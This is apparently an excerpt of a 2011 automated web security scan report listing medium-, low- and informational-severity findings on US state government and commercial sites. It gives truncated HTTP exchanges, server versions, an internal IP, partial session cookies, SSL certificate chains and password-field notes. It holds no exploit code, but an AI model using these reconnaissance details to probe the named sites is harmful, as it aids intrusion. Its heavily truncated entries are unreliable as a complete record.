| GET /00/home/0,2061,4802,00 Host: ga.gov Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=E163D8F13 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:07:16 GMT Server: Apache/1.3.29 (Unix) Content-Type: text/html Content-Length: 27652 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://kodakimagingn |
| Path: | /m2/kodakimagingnetworki |
| GET /m2/kodakimagingnetworki Host: kodakimagingnetworki.tt Proxy-Connection: keep-alive Referer: http://www.kodakgallery User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK pragma: no-cache Content-Type: text/javascript Content-Length: 1499 Date: Sat, 30 Apr 2011 15:08:20 GMT Server: Test & Target var mboxCurrent=mboxFactories ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://l.sharethis.com |
| Path: | /pview |
| GET /pview?event=pview Host: l.sharethis.com Proxy-Connection: keep-alive Referer: http://tn.gov/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __stid=CspT702sdV9LL |
| HTTP/1.1 204 No Content Server: nginx/0.7.65 Date: Sat, 30 Apr 2011 00:37:30 GMT Connection: keep-alive |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://louisianadcp |
| Path: | /login.do |
| GET /login.do HTTP/1.1 Host: louisianadcpretire.gwrs Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:22:11 GMT Server: FASCore Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Cache-Control: no-cache="set-cookie" Pragma: no-cache Content-Length: 10709 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=khX0N72Sv Content-Language: en-US P3P: CP="ALL DSP COR CUR ADM DEV TAI HIS OUR OTRi BUS PHY ONL UNI FIN COM NAV INT DEM GOV" Connection: close Content-Type: text/html;charset=UTF-8 <html xmlns="http://www.w3.org <!-- function setFocus() { document.getElementById( ...[SNIP]... <span class="systemMenuBot ...[SNIP]... <span class="systemMenuBot ...[SNIP]... <span class="systemMenuBot ...[SNIP]... <span class="systemMenuBot ...[SNIP]... <span class="systemMenuBot ...[SNIP]... <span class="systemMenuBot ...[SNIP]... <span class="systemMenuBot ...[SNIP]... <span class="systemMenuBot ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://maps.googleapis |
| Path: | /maps/api/js/Authent |
| GET /maps/api/js/Authent Host: maps.googleapis.com Proxy-Connection: keep-alive Referer: http://kentucky.gov/Pages User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Sat, 30 Apr 2011 00:37:18 GMT Server: mafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 37 _xdc_._tgkwur && _xdc_._tgkwur( [1] ) |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://maps.googleapis |
| Path: | /maps/api/js/Viewpor |
| GET /maps/api/js/Viewpor Host: maps.googleapis.com Proxy-Connection: keep-alive Referer: http://data.ok.gov/Public User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Sat, 30 Apr 2011 11:23:05 GMT Server: mafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 4488 _xdc_._73y626 && _xdc_._73y626( ["Map data ..2011 Europa Technologies, Geocentre Consulting, Tele Atlas, Whereis(R), Sensis Pty Ltd",[["obliques",[[40 ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://mt0.googleapis.com |
| Path: | /mapslt/ft |
| GET /mapslt/ft?hl=en-US&lyrs Host: mt0.googleapis.com Proxy-Connection: keep-alive Referer: http://data.ok.gov/Public User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 11:23:05 GMT Expires: Sat, 30 Apr 2011 11:23:05 GMT Cache-Control: private, max-age=3600 Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Server: maptiles-versatile X-XSS-Protection: 1; mode=block Content-Length: 773 _xdc_._coix7n && _xdc_._coix7n([{id: ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://myalaska.state.ak |
| Path: | /home/app |
| GET /home/app?service Host: myalaska.state.ak.us Connection: keep-alive Referer: https://myalaska.state.ak User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 22:10:40 GMT Pragma: No-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 14:00:00 AKST Set-Cookie: JSESSIONID=504573A02 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Length: 19943 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <!-- Application: myalaskabarebones --> <!-- Page: launch --> <!-- Generated: Sat Apr 30 14:10:40 ...[SNIP]... <div style="margin-left:4px"> <a href="/home/app ...[SNIP]... <br /> <a href="/home/app ...[SNIP]... <br /> <a href="/home/app ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://server.iad |
| Path: | /hc/33511087/ |
| GET /hc/33511087/?visitor= Host: server.iad.liveperson.net Proxy-Connection: keep-alive Referer: http://de.gov/topics User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: HumanClickKEY=320998 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:38:23 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID Set-Cookie: LivePersonID=-166012 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 34 GIF89aP............,..... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://services.georgia |
| Path: | /dhr/cspp/do/public |
| GET /dhr/cspp/do/public Host: services.georgia.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.0 200 OK Date: Sat, 30 Apr 2011 12:22:50 GMT Server: Sun-Java-System Content-type: text/html;charset=UTF-8 X-powered-by: Servlet/2.4 Pragma: No-cache Cache-control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT X-powered-by: JSP/2.0 Set-cookie: JSESSIONID=a6618311c Connection: close <html> <body> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td> <body style="background-color: <TABLE cellSpacing=0 cellPadding=0 wid ...[SNIP]... </table> <link href="/dhr/cspp/pages <script> ...[SNIP]... <td valign="bottom" width="125" height="35"> <a href="/dhr/cspp/do/public ...[SNIP]... <td valign="bottom" width="125" height="35"> <a href="/dhr/cspp/do/public ...[SNIP]... <td valign="bottom" width="125" height="35"> <a href="/dhr/cspp/do ...[SNIP]... <td valign="bottom" width="125" height="35"> <a href="/dhr/cspp/do ...[SNIP]... <td valign="bottom" width="125" height="35"> <a href="/dhr/cspp/do ...[SNIP]... <b><a href="/dhr/cspp/do/public ...[SNIP]... <b><a href="/dhr/cspp/do/public ...[SNIP]... <b><a href="/dhr/cspp/do/public ...[SNIP]... <b><a href="/dhr/cspp/do/public ...[SNIP]... <b><a href="/dhr/cspp/do/Logon ...[SNIP]... <td width="84%" ><a href="/dhr/cspp/do/public ...[SNIP]... <td width="84%" ><a href="/dhr/cspp/do/public ...[SNIP]... <td width="84%"><a href="/dhr/cspp/do/public ...[SNIP]... <td width="84%" ><a href="/dhr/cspp/do/public ...[SNIP]... <td width="84%" ><a href="/dhr/cspp/do/public ...[SNIP]... <td width="84%" ><a href="/dhr/cspp/do/public ...[SNIP]... <td ><a href="/dhr/cspp/do/public ...[SNIP]... <td width="84%" ><a href="/dhr/cspp/do/public ...[SNIP]... <td> <a href="/dhr/cspp/do/public ...[SNIP]... <li><a href="/dhr/cspp/do/public ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://www.budget.state |
| Path: | /portal/server.pt |
| GET /portal/server.pt Host: www.budget.state.pa.us Proxy-Connection: keep-alive Referer: http://pa.gov/portal User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:37:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Language: en Set-Cookie: ASP.NET_SessionId Expires: 1304037449218 Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Last-Modified: 1304123849218 Content-Type: text/html; charset=utf-8 Content-Length: 52356 <html> <head><link type="text/css" href="http://www.portal ...[SNIP]... <LI><A title="2010-11 Enacted Budget (House Bill 2279 Printer's Number 4032) .pdf" href="http://www.legis ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://www.ehawaii.gov |
| Path: | /dakine/index.html |
| GET /dakine/index.html HTTP/1.1 Host: www.ehawaii.gov Proxy-Connection: keep-alive Referer: http://hawaii.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 22:09:59 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 21026 <?xml version="1.0"?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <he ...[SNIP]... <img src="images/bullet-arrow ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://www.goccp.maryland |
| Path: | /lists/index.php |
| GET /lists/index.php HTTP/1.1 Host: www.goccp.maryland.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:36:00 GMT Content-Type: text/html Connection: close Server: Apache/2 Set-Cookie: PHPSESSID=77254ae051 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 14316 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html><head> <meta http-equiv="Cache-Control <meta http ...[SNIP]... <noscript><a href="/resources/resource ...[SNIP]... </a> <a href="?PHPSESSID ...[SNIP]... <p><a href="./?p=subscribe ...[SNIP]... <p><a href="./?p=unsubscribe ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://www.in.gov |
| Path: | /dhs/3163.htm |
| GET /dhs/3163.htm HTTP/1.1 Host: www.in.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=58136434 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:39:00 GMT Server: Apache/2.2.13 (Unix) DAV/2 Accept-Ranges: bytes Connection: close Content-Type: text/html Set-Cookie: BIGipServerdhs_web_prod Content-Length: 36537 ...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><!-- PageID 3163 - pub ...[SNIP]... <li><a href="https://oas.in.gov ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://www.kodakgallery |
| Path: | /gallery/lp/2010/visit |
| GET /gallery/lp/2010/visit Host: www.kodakgallery.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Cache-Control: no-cache, no-store Expires: -1 Set-Cookie: JSESSIONID=D46B50E50 Set-Cookie: sourceId=500019816903; Domain=kodakgallery.com; Expires=Mon, 30-May-2011 12:39:07 GMT; Path=/ Set-Cookie: sourceId=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: DYN_EMAIL=anon_mem12 Set-Cookie: bookStartTest1=control; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/ Set-Cookie: bookUnlockedLayoutTest Set-Cookie: ft_80002=none; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/ Set-Cookie: abTest=bookStartTest1 Content-Type: text/html;charset=ISO Date: Sat, 30 Apr 2011 12:39:07 GMT Server: ecom302 Connection: close Content-Length: 38122 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equ ...[SNIP]... <li> <a href="/photo-cards ...[SNIP]... <li> <a href="/photo-cards/baby ...[SNIP]... <li> <a href="/photo-cards ...[SNIP]... <li> <a href="/photo-cards/full ...[SNIP]... <li> <a href="/photo-cards ...[SNIP]... <li> <a href="/photo-cards/kids ...[SNIP]... <li> <a href="/photo-cards/thank ...[SNIP]... <li> <a href="/photo-cards ...[SNIP]... <li> <a href="/photo-cards ...[SNIP]... <li> <a href="/photo-cards ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://www.legis.state.pa |
| Path: | /cfdocs/legis/PN/Public |
| GET /cfdocs/legis/PN/Public Host: www.legis.state.pa.us Proxy-Connection: keep-alive Referer: http://www.budget.state User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 00:41:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html <html style=""><head style=""><title style="">Regular Session 2009-2010 House Bill 2279 P.N. 4032 </title> <META content="text/html; charset=UTF-8" http-equiv="Content-Type" style=""></META> < ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | https://www.myhealth.va |
| Path: | /mhv-portal-web/anonymous |
| GET /mhv-portal-web/anonymous Host: www.myhealth.va.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:39:37 GMT Content-type: text/html; charset=UTF-8 Cache-Control: no-cache="set-cookie" Pragma: No-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT X-wily-servlet: Clear appServerIp=10.224.43.30 Set-Cookie: JSESSIONID=KyLqN8DJh X-Powered-By: Servlet/2.4 JSP/2.0 X-wily-info: Clear guid=A66BDECC0AE02B1 Connection: close Set-Cookie: TSd0b0d9=f8f48700ac5 Content-Length: 22826 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title>My HealtheVet </title><meta name="bea-portal-me ...[SNIP]... <li class="bea-portal-book ...[SNIP]... <li class="bea-portal-book ...[SNIP]... <li class="bea-portal-book ...[SNIP]... <li class="bea-portal-book ...[SNIP]... <li class="bea-portal-book ...[SNIP]... <li class="bea-portal-book ...[SNIP]... <li class="bea-portal-book ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Firm |
| Host: | http://www.utah.gov |
| Path: | /transparency/index.html |
| GET /transparency/index.html HTTP/1.1 Host: www.utah.gov Proxy-Connection: keep-alive Referer: http://www.utah.gov/index User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147646579 |
| HTTP/1.1 200 OK X-Powered-By: JSP/2.1 Server: Sun Java System Application Server 9.1_02 Set-Cookie: JSESSIONID=626d4214f Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Sat, 30 Apr 2011 11:24:13 GMT Content-Length: 18333 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv=" ...[SNIP]... <a href="entity_profile.html ...[SNIP]... <a href="entity_profile.html ...[SNIP]... <a href="entity_profile.html ...[SNIP]... <a href="entity_profile.html ...[SNIP]... <a href="entity_profile.html ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Certain |
| Host: | https://nhlicenses2.nh |
| Path: | / |
| Issued to: | nhlicenses2.nh.gov |
| Issued by: | GeoTrust SSL CA |
| Valid from: | Wed Feb 16 09:04:49 CST 2011 |
| Valid to: | Fri Apr 19 13:56:42 CDT 2013 |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://mibid.bidcorp.com |
| Path: | / |
| Issued to: | *.bidcorp.com |
| Issued by: | RapidSSL CA |
| Valid from: | Sat Feb 12 06:22:11 CST 2011 |
| Valid to: | Mon Apr 15 03:24:27 CDT 2013 |
| Issued to: | RapidSSL CA |
| Issued by: | GeoTrust Global CA |
| Valid from: | Fri Feb 19 16:45:05 CST 2010 |
| Valid to: | Tue Feb 18 16:45:05 CST 2020 |
| Issued to: | GeoTrust Global CA |
| Issued by: | GeoTrust Global CA |
| Valid from: | Mon May 20 23:00:00 CDT 2002 |
| Valid to: | Fri May 20 23:00:00 CDT 2022 |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://nhlicenses.nh.gov |
| Path: | / |
| Issued to: | nhlicenses.nh.gov |
| Issued by: | Equifax Secure Certificate Authority |
| Valid from: | Fri Mar 26 00:34:13 CDT 2010 |
| Valid to: | Mon Jun 25 21:31:26 CDT 2012 |
| Issued to: | Equifax Secure Certificate Authority |
| Issued by: | Equifax Secure Certificate Authority |
| Valid from: | Sat Aug 22 11:41:51 CDT 1998 |
| Valid to: | Wed Aug 22 11:41:51 CDT 2018 |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://treas-secure |
| Path: | / |
| Issued to: | TREAS-SECURE.TREAS.STATE.MI.US |
| Issued by: | VeriSign Class 3 Secure Server CA - G2 |
| Valid from: | Mon Jun 21 19:00:00 CDT 2010 |
| Valid to: | Sat Jul 09 18:59:59 CDT 2011 |
| Issued to: | VeriSign Class 3 Secure Server CA - G2 |
| Issued by: | VeriSign Trust Network |
| Valid from: | Tue Mar 24 19:00:00 CDT 2009 |
| Valid to: | Sun Mar 24 18:59:59 CDT 2019 |
| Issued to: | VeriSign Trust Network |
| Issued by: | VeriSign Trust Network |
| Valid from: | Sun May 17 19:00:00 CDT 1998 |
| Valid to: | Tue Aug 01 18:59:59 CDT 2028 |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.alabamai |
| Path: | / |
| Issued to: | www.alabamainteractive.org |
| Issued by: | Equifax Secure Certificate Authority |
| Valid from: | Sun Aug 16 23:56:09 CDT 2009 |
| Valid to: | Thu Oct 17 04:54:34 CDT 2013 |
| Issued to: | Equifax Secure Certificate Authority |
| Issued by: | Equifax Secure Certificate Authority |
| Valid from: | Sat Aug 22 11:41:51 CDT 1998 |
| Valid to: | Wed Aug 22 11:41:51 CDT 2018 |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.compasss |
| Path: | / |
| Issued to: | www.compasssmartshopper.com |
| Issued by: | Go Daddy Secure Certification Authority |
| Valid from: | Wed Jun 23 11:33:26 CDT 2010 |
| Valid to: | Sun Jun 23 11:33:26 CDT 2013 |
| Issued to: | Go Daddy Secure Certification Authority |
| Issued by: | Go Daddy Class 2 Certification Authority |
| Valid from: | Wed Nov 15 19:54:37 CST 2006 |
| Valid to: | Sun Nov 15 19:54:37 CST 2026 |
| Issued to: | Go Daddy Class 2 Certification Authority |
| Issued by: | Go Daddy Class 2 Certification Authority |
| Valid from: | Tue Jun 29 12:06:20 CDT 2004 |
| Valid to: | Thu Jun 29 12:06:20 CDT 2034 |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.nrsservi |
| Path: | / |
| Issued to: | www.nrsservicecenter.com |
| Issued by: | www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign |
| Valid from: | Thu Sep 09 19:00:00 CDT 2010 |
| Valid to: | Tue Oct 09 18:59:59 CDT 2012 |
| Issued to: | www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign |
| Issued by: | Class 3 Public Primary Certification Authority |
| Valid from: | Wed Apr 16 19:00:00 CDT 1997 |
| Valid to: | Mon Oct 24 18:59:59 CDT 2011 |
| Issued to: | Class 3 Public Primary Certification Authority |
| Issued by: | Class 3 Public Primary Certification Authority |
| Valid from: | Sun Jan 28 18:00:00 CST 1996 |
| Valid to: | Tue Aug 01 18:59:59 CDT 2028 |
| Issued to: | Class 3 Public Primary Certification Authority |
| Issued by: | Class 3 Public Primary Certification Authority |
| Valid from: | Sun Jan 28 18:00:00 CST 1996 |
| Valid to: | Wed Aug 02 18:59:59 CDT 2028 |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://digg.com |
| Path: | /submit |
| GET /submit HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:20:08 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 Cache-Control: no-cache,no-store,must Pragma: no-cache Set-Cookie: traffic_control= Set-Cookie: d=812aa8e869f0d2e7c8 X-Digg-Time: D=24701 10.2.129.157 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 8171 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Digg - Submit a link </title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics ...[SNIP]... </script><form class="hidden"> <input type="text" name="ident" value="" id="ident-saved"> <input type="password" name="password" value="" id="password-saved"> </form> ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.alabama.gov |
| Path: | /portal/index.jsp |
| GET /portal/index.jsp HTTP/1.1 Host: www.alabama.gov Proxy-Connection: keep-alive Referer: http://al.gov/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:36:24 GMT Server: Apache/1.3.41 (Unix) Resin/3.0.25 Cache-Control: private Set-Cookie: JSESSIONID=abcI5QvmC Content-Type: text/html Content-Length: 34756 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equ ...[SNIP]... <noscript><form action='http://www ...[SNIP]... <p> password:<input type="password" name="login_password" id="login_password" value="" /> </p> ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | https://fortress.wa.gov |
| Path: | /dol/dolprod/dsdoffices/ |
| GET /dol/dolprod/dsdoffices/ HTTP/1.1 Host: fortress.wa.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK connection: close content-type: text/html; charset=utf-8 date: Sat, 30 Apr 2011 12:20:40 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: Microsoft-IIS/6.0 x-old-content-length: 26606 cache-control: private x-powered-by: ASP.NET x-aspnet-version: 2.0.50727 Set-Cookie: AMWEBJCT!%2Fdol%2Fdolprod Set-Cookie: PD_STATEFUL_101c5ca4-0734 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"> ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTA2NjU5MDY0 |